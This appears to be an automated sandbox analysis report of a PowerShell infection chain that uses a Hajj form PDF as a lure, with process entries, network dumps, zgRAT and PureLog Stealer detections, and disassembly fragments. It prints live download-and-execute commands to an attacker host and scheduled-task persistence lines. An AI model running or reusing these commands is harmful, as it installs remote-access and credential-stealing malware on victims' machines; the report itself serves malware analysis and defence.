                                                                                                                                          2024-09-30 16:59:50 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 75 4c 44 6e 56 64 71 54 50 6b 32 65 6b 4e 77 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 65 38 66 65 65 66 61 36 39 62 33 33 35 35 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 66 43 6e 7a 53 7a 79 76 51 63 39 2b 49 50 79 57 64 4a 62 61 32 41 52 75 2b 78 4b 55 37 73 39 53 69 79 34 4c 50 5a 78 71 64 79 73 71 2b 6a 73 55 44 32 63 50 4f 43 4e 69 68 79 51 49 69 5a 52 6a 37 66 59 7a 4d 6b 4c 38 61 34 54 51 4d 38 2f 32 4e 49 41 58 58 48 73 74 2f 38 59 4d 4b 66 6b 31 66 61 34 34 47 4a 76 4d 66 4a 46 4e
                                                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: uLDnVdqTPk2ekNwV.2Context: 3e8feefa69b33555<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATfCnzSzyvQc9+IPyWdJba2ARu+xKU7s9Siy4LPZxqdysq+jsUD2cPOCNihyQIiZRj7fYzMkL8a4TQM8/2NIAXXHst/8YMKfk1fa44GJvMfJFN
                                                                                                                                          2024-09-30 16:59:50 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 75 4c 44 6e 56 64 71 54 50 6b 32 65 6b 4e 77 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 65 38 66 65 65 66 61 36 39 62 33 33 35 35 35 0d 0a 0d 0a
                                                                                                                                          Data Ascii: BND 3 CON\QOS 56MS-CV: uLDnVdqTPk2ekNwV.3Context: 3e8feefa69b33555
                                                                                                                                          2024-09-30 16:59:50 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                                                          2024-09-30 16:59:50 UTC58INData Raw: 4d 53 2d 43 56 3a 20 45 64 6b 52 6f 64 45 45 61 45 47 67 6c 51 4f 76 62 61 64 73 67 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                          Data Ascii: MS-CV: EdkRodEEaEGglQOvbadsgA.0Payload parsing failed.


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:12:58:06
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c start https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf; irm http://drive.desktopserver.top/file/| Powershell
                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:12:58:06
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:12:58:09
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf
                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:12:58:09
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                          Imagebase:0x7ff7e52b0000
                                                                                                                                          File size:55'320 bytes
                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:12:58:09
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2056,i,4768736094800516795,6522799854547835148,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:12:58:13
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:12:58:17
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:12:58:17
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:12:58:17
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:18
                                                                                                                                          Start time:12:58:20
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell
                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:12:58:20
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell
                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:20
                                                                                                                                          Start time:12:58:20
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell
                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:22
                                                                                                                                          Start time:12:58:26
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000002.2627405581.000002335422D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:23
                                                                                                                                          Start time:12:58:26
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2614802027.000001CCBEA5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:24
                                                                                                                                          Start time:12:58:26
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2471509926.000001F3185BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:25
                                                                                                                                          Start time:12:58:32
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:26
                                                                                                                                          Start time:12:58:32
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:27
                                                                                                                                          Start time:12:58:32
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:28
                                                                                                                                          Start time:12:58:32
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:29
                                                                                                                                          Start time:12:58:32
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:30
                                                                                                                                          Start time:12:58:32
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:31
                                                                                                                                          Start time:12:58:33
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:32
                                                                                                                                          Start time:12:58:33
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:33
                                                                                                                                          Start time:12:58:33
                                                                                                                                          Start date:30/09/2024
                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                                                                                                                                          Imagebase:0x7ff6eef90000
                                                                                                                                          File size:235'008 bytes
                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Disassembly

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:3.2%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:8
                                                                                                                                            Total number of Limit Nodes:1
                                                                                                                                            execution_graph 12085 7ff848a5d4f9 12087 7ff848a5d549 12085->12087 12086 7ff848a5d552 12087->12086 12088 7ff848a5d67d CreateFileW 12087->12088 12089 7ff848a5d6de 12088->12089 12090 7ff848a545ea 12091 7ff848a9fc60 GetFileType 12090->12091 12093 7ff848a9fce4 12091->12093

                                                                                                                                            Executed Functions

                                                                                                                                            Function 00007FF848A56DF0 Relevance: 9.6, Strings: 7, Instructions: 871COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 7ff848a56df0-7ff848a5c73a 4 7ff848a5c73c-7ff848a5c74c 0->4 5 7ff848a5c74e-7ff848a5c75f 0->5 4->4 4->5 6 7ff848a5c761-7ff848a5c76f 5->6 7 7ff848a5c770-7ff848a5c7a1 5->7 6->7 11 7ff848a5c7f7-7ff848a5c7fe 7->11 12 7ff848a5c7a3-7ff848a5c7a9 7->12 13 7ff848a5c83f-7ff848a5c868 11->13 14 7ff848a5c800-7ff848a5c801 11->14 12->11 15 7ff848a5c7ab-7ff848a5c7ac 12->15 16 7ff848a5c804-7ff848a5c807 14->16 17 7ff848a5c7af-7ff848a5c7b2 15->17 18 7ff848a5c869-7ff848a5cb93 call 7ff848a54620 16->18 19 7ff848a5c809-7ff848a5c81a 16->19 17->18 21 7ff848a5c7b8-7ff848a5c7c8 17->21 62 7ff848a5cb9a-7ff848a5cbb6 18->62 24 7ff848a5c81c-7ff848a5c822 19->24 25 7ff848a5c836-7ff848a5c83d 19->25 22 7ff848a5c7ca-7ff848a5c7ec 21->22 23 7ff848a5c7f0-7ff848a5c7f5 21->23 22->23 23->11 23->17 24->18 28 7ff848a5c824-7ff848a5c832 24->28 25->13 25->16 28->25 64 7ff848a5cbbc-7ff848a5cbd5 62->64 65 7ff848a5cbb8-7ff848a5cbba 62->65 67 7ff848a5cbd7-7ff848a5cbe5 64->67 65->67 68 7ff848a5cbeb-7ff848a5cc71 call 7ff848a57be8 67->68 69 7ff848a5cc72-7ff848a5cc81 67->69 68->69 70 7ff848a5cc9b-7ff848a5cc9e 69->70 71 7ff848a5cc83-7ff848a5cc9a 69->71 73 7ff848a5cd58-7ff848a5cd98 70->73 74 7ff848a5cca4-7ff848a5cd57 call 7ff848a57b98 70->74 71->70 85 7ff848a5cd9e-7ff848a5cdac 73->85 86 7ff848a5ce89-7ff848a5ce97 call 7ff848a5cf2e 73->86 74->73 89 7ff848a5ce41-7ff848a5ce6f 85->89 90 7ff848a5cdb2-7ff848a5cdbd 85->90 98 7ff848a5ce99-7ff848a5cea9 86->98 99 7ff848a5ceaa-7ff848a5ceb5 86->99 102 7ff848a5ce71-7ff848a5ce81 89->102 103 7ff848a5ce82-7ff848a5ce86 89->103 98->99 104 7ff848a5cf0d-7ff848a5cf2d 99->104 105 7ff848a5ceb7-7ff848a5cefb call 7ff848a52ed8 99->105 102->103 103->86 105->104
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2358200446.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848a50000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ZM_H$x6^$x6^$x6^$x6^$6^$6^
                                                                                                                                            • API String ID: 0-3571902926
                                                                                                                                            • Opcode ID: 4c22f336c5a8c997b897e0e38e7bc5e3cf691e287a327826221e4ef7b30d0d54
                                                                                                                                            • Instruction ID: 3b7dfc9381ca9bfaa084a9ceb87c164a69ea46501cecec6455083b31c8b53356
                                                                                                                                            • Opcode Fuzzy Hash: 4c22f336c5a8c997b897e0e38e7bc5e3cf691e287a327826221e4ef7b30d0d54
                                                                                                                                            • Instruction Fuzzy Hash: B2424A31A0EA4A4FE789EB3C84566B9B7D2FF55760F0442BEC04EC7196DE389882C751
                                                                                                                                            Function 00007FF848A5C93B Relevance: 8.0, Strings: 6, Instructions: 473COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2358200446.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848a50000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ZM_H$x6^$x6^$x6^$6^$6^
                                                                                                                                            • API String ID: 0-1373578762
                                                                                                                                            • Opcode ID: ee31e7d9d6c8c2a74de25216fe644d0cd1ea5fafc3e016a984ece781c0815488
                                                                                                                                            • Instruction ID: 48b3e45bb9d5f2b5567b15b8e35715d523e42db4f19d1485847b6770768cb435
                                                                                                                                            • Opcode Fuzzy Hash: ee31e7d9d6c8c2a74de25216fe644d0cd1ea5fafc3e016a984ece781c0815488
                                                                                                                                            • Instruction Fuzzy Hash: 70E1F931A1EA4A8FE789EB3C44166B9B7D2FF55750B0442FEC04EC7296DE389C828751
                                                                                                                                            Function 00007FF848A5CA35 Relevance: 5.4, Strings: 4, Instructions: 367COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2358200446.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848a50000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ZM_H$x6^$6^$6^
                                                                                                                                            • API String ID: 0-882076941
                                                                                                                                            • Opcode ID: 45b97d8edc09ecabe6b4f296d42c3da368c7a662d33cea5521b6bd0bb63fd045
                                                                                                                                            • Instruction ID: 31b7a859036d36860c02d4fbbe242bd43eb0c386b62a7d892395bcf86a2780f7
                                                                                                                                            • Opcode Fuzzy Hash: 45b97d8edc09ecabe6b4f296d42c3da368c7a662d33cea5521b6bd0bb63fd045
                                                                                                                                            • Instruction Fuzzy Hash: 73B10931F0EA468FE789EB3C44262B9B7D2EF55750B0441FEC04ECB296DE689C828755
                                                                                                                                            Function 00007FF848A5CA90 Relevance: 2.8, Strings: 2, Instructions: 335COMMON
